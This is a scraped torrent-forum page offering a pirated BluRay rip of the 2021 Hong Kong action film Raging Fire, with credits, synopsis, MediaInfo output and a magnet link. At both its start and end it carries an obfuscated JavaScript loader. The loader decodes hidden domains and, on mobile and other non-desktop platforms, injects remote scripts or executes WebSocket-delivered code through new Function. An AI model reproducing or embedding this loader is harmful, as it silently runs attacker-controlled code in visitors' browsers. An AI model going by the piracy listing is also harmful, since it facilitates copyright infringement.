怒火·重案[国粤语音轨/简繁字幕].Raging.Fire.2021.BluRay.1080p.2Audio.TrueHD.7.1.x265.10bit-bt9527.cc 12.56GB

版主小s 13天前 174

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 怒火·重案 / 怒火重案 / 怒火战 / 火拼 / Crossfire / Raging Fire

◎片 名 怒火

◎年 代 2021

◎产 地 中国香港 / 中国大陆

◎类 别 动作 / 犯罪

◎语 言 粤语 / 汉语普通话

◎上映日期 2021-07-30(中国大陆) / 2021-08-19(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt8165192/

◎豆瓣评分 7.2/10 (351595人评价)

◎豆瓣链接 https://movie.douban.com/subject/30174085/

◎片 长 128分钟

◎导 演 陈木胜 Benny Chan (id:1274293)

◎编 剧 陈木胜 Benny Chan (id:1274293)

凌伟骏 Ryan Wai-Chun Ling (id:1433091)

唐耀良 Yiu-leung Tong (id:1364033)

◎演 员 甄子丹 Donnie Yen (id:1025194)

谢霆锋 Nicholas Tse (id:1050053)

秦岚 Lan Qin (id:1274294)

谭耀文 Patrick Tam (id:1033280)

黄德斌 Tak-bun Wong (id:1274442)

吴浩康 Deep Ng (id:1313361)

何珮瑜 Jeana Ho (id:1316213)

杨天宇 Angus Yeung (id:1387692)

汤君慈 Bruce Tong (id:1339998)

麦亨利 Henry Mai (id:1377803)

喻亢 Kang Yu (id:1339113)

张文杰 Man Kit Cheung (id:1336383)

胡子彤 Tony Tsz-Tung Wu (id:1362877)

吕良伟 Ray Lui (id:1037706)

任达华 Simon Yam (id:1031194)

袁富华 Fu-wah Yuen (id:1359508)

林国斌 Ben Lam (id:1289293)

卢惠光 Ken Lo (id:1032633)

陈家乐 Carlos Chan (id:1275972)

张国强 Kwok Keung Cheung (id:1274568)

汤怡 Kathy Tong (id:1314475)

高战 Chris Collins (id:1379355)

辛格·哈提汗·比托 Singh Hartihan Bitto (id:1333958)

克里斯·柯林斯 K.C. Collins (id:1338050)

何俊轩 Ho Chun Hin (id:1376225)

蒙为亮 Mung Wai Leong (id:1387091)

骆振伟 Thor Lok (id:1375838)

郑咏谦 Moses Wing-Him Cheng (id:1459957)

张颖富 (id:1402802)

谭干聪 Kon Chung Tam (id:1400227)

杜港 Kong To (id:1440814)

高俊文 Chun-Man Ko (id:1410440)

周祉君 Aaron Chow (id:1365642)

梁雍婷 Rachel Leung (id:1371987)

邹凯光 Matt Chow (id:1275121)

火火 Fire Lee Ka Wing (id:1322557)

罗浩铭 Ken Ho-Ming Law (id:1371352)

李凯贤 Brian Lee (id:1374560)

郭锋 Fung Kwok (id:1314508)

郭政鸿 Jing-hung Kwok (id:1044122)

麦长青 Cheung-Ching Mak (id:1274580)

陈木胜 Benny Chan (id:1274293)

甄子丹 Donnie Yen (id:1025194)

邵剑秋 Kim-Chau Shiu (id:1413263)

陈一奇 Yiqi Chen (id:1446359)

程武 Wu Cheng (id:1406349)

杨受成 Albert Yeung (id:1313455)

高莉 Anna Gao (id:1432407)

郑志昊 Zhihao Zheng (id:1397531)

李绮雯 Yee-Man Lee (id:1353241)

杨雪雯 (id:1450635)

区椲麟 (id:1450636)

梁琳 Lin Liang (id:1400716)

黎子良 Bernard Lai (id:1438022)

林明杰 Eric Lin (id:1374637)

张博 (id:1450637)

张康达 Hong Tat Cheung (id:1395690)

谢炀 (id:1450638)

贾淕 Lu Jia (id:1447542)

尼古拉斯·埃热拉 Nicolas Errèra (id:1021001)

冯远文 Yuen Man Fung (id:1369778)

彭正熙 Curran Pang (id:1305790)

周德夫 (id:1447547)

陈嘉仪 Furze Chan (id:1346425)

梁伟民 Raymond Wai-Man Leung (id:1378360)

林洪峯 Alex Lim Hung Fung (id:1330656)

李忠志 Chung Chi Li (id:1014763)

谷垣健治 Kenji Tanigaki (id:1335515)

谷轩昭 Huan-Chiu Ku (id:1289063)

甄子丹 Donnie Yen (id:1025194)

潘耀明 Anthony Pun (id:1307639)

岑建勋 John Sham (id:1274474)

◎标 签 警匪 / 中国香港 / 动作 / 犯罪 / 枪战 / 2021 / 悬疑 / 中国大陆

◎简 介

重案组布网围剿国际毒枭,突然杀出一组蒙面悍匪“黑吃黑”,更冷血屠杀众警察。重案组督察张崇邦(甄子丹 饰)亲睹战友被杀,深入追查发现,悍匪首领竟是昔日战友邱刚敖(谢霆锋 饰)。原来敖也曾是警队明日之星,而将敖推向罪恶深渊的人,却正是邦。宿命令二人再次纠缠,一切恩怨张崇邦如何作出了断……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 271725060079344848955235466669933547091 (0xCC6C57CDD8C8B809AFE4A59825E14E53)

  4. Complete name : R[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 12.6 GiB

  8. Duration : 2 h 5 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 14.3 Mb/s

  11. Encoded date : UTC 2021-11-21 10:11:28

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 5 min

  21. Bit rate : 4 870 kb/s

  22. Width : 1 920 pixels

  23. Height : 806 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.131

  31. Stream size : 4.28 GiB (34%)

  32. Title : HEVC, [email protected]@High, 24 fps @ 4870 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x806 / interlace=0 / total-frames=181211 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : MLP FBA

  45. Format/Info : Meridian Lossless Packing FBA

  46. Commercial name : Dolby TrueHD

  47. Codec ID : A_TRUEHD

  48. Duration : 2 h 5 min

  49. Bit rate mode : Variable

  50. Bit rate : 3 955 kb/s

  51. Maximum bit rate : 7 236 kb/s

  52. Channel(s) : 8 channels

  53. Channel layout : L R C LFE Ls Rs Lb Rb

  54. Sampling rate : 96.0 kHz

  55. Frame rate : 1 200.000 FPS (80 SPF)

  56. Compression mode : Lossless

  57. Stream size : 3.48 GiB (28%)

  58. Title : Cantonese Dolby TrueHD 7.1 @ 4595 kbps

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 2 h 5 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 576 MiB (4%)

  77. Title : Cantonese Dolby Digital Audio 5.1 @ 640 kbps

  78. Language : Chinese

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : MLP FBA

  85. Format/Info : Meridian Lossless Packing FBA

  86. Commercial name : Dolby TrueHD

  87. Codec ID : A_TRUEHD

  88. Duration : 2 h 5 min

  89. Bit rate mode : Variable

  90. Bit rate : 3 962 kb/s

  91. Maximum bit rate : 7 008 kb/s

  92. Channel(s) : 8 channels

  93. Channel layout : L R C LFE Ls Rs Lb Rb

  94. Sampling rate : 96.0 kHz

  95. Frame rate : 1 200.000 FPS (80 SPF)

  96. Compression mode : Lossless

  97. Stream size : 3.48 GiB (28%)

  98. Title : Mandarin Dolby TrueHD 7.1 @ 4602 kbps

  99. Language : Chinese

  100. Default : No

  101. Forced : No


  102. Audio #4

  103. ID : 5

  104. Format : AC-3

  105. Format/Info : Audio Coding 3

  106. Commercial name : Dolby Digital

  107. Codec ID : A_AC3

  108. Duration : 2 h 5 min

  109. Bit rate mode : Constant

  110. Bit rate : 640 kb/s

  111. Channel(s) : 6 channels

  112. Channel layout : L R C LFE Ls Rs

  113. Sampling rate : 48.0 kHz

  114. Frame rate : 31.250 FPS (1536 SPF)

  115. Compression mode : Lossy

  116. Stream size : 576 MiB (4%)

  117. Title : Mandarin Dolby Digital Audio 5.1 @ 640 kbps

  118. Language : Chinese

  119. Service kind : Complete Main

  120. Default : No

  121. Forced : No


  122. Text #1

  123. ID : 6

  124. Format : PGS

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 56 min

  128. Bit rate : 28.2 kb/s

  129. Count of elements : 2041

  130. Stream size : 23.5 MiB (0%)

  131. Title : Cht/SUP 原盘繁体

  132. Language : Chinese

  133. Default : No

  134. Forced : No


  135. Text #2

  136. ID : 7

  137. Format : PGS

  138. Codec ID : S_HDMV/PGS

  139. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  140. Duration : 1 h 56 min

  141. Bit rate : 27.7 kb/s

  142. Count of elements : 2049

  143. Stream size : 23.1 MiB (0%)

  144. Title : Chs/SUP 原盘简体

  145. Language : Chinese

  146. Default : Yes

  147. Forced : No


  148. Text #3

  149. ID : 8

  150. Format : PGS

  151. Codec ID : S_HDMV/PGS

  152. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  153. Duration : 1 h 56 min

  154. Bit rate : 31.4 kb/s

  155. Count of elements : 2049

  156. Stream size : 26.1 MiB (0%)

  157. Title : Eng/SUP

  158. Language : English

  159. Default : No

  160. Forced : No


  161. Menu

  162. 00:00:00.000 : en:第 01 章

  163. 00:10:25.750 : en:第 02 章

  164. 00:20:19.000 : en:第 03 章

  165. 00:30:07.958 : en:第 04 章

  166. 00:38:49.875 : en:第 05 章

  167. 00:52:53.250 : en:第 06 章

  168. 01:02:53.375 : en:第 07 章

  169. 01:13:14.542 : en:第 08 章

  170. 01:26:47.542 : en:第 09 章

  171. 01:34:34.708 : en:第 10 章

  172. 01:43:26.750 : en:第 11 章

  173. 01:52:06.750 : en:第 12 章




复制代码


TAGS 动作 犯罪

磁力链:
  • magnet:?xt=urn:btih:224A0E8F7A0352A5BAD115C4E109083E10E27F0A

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};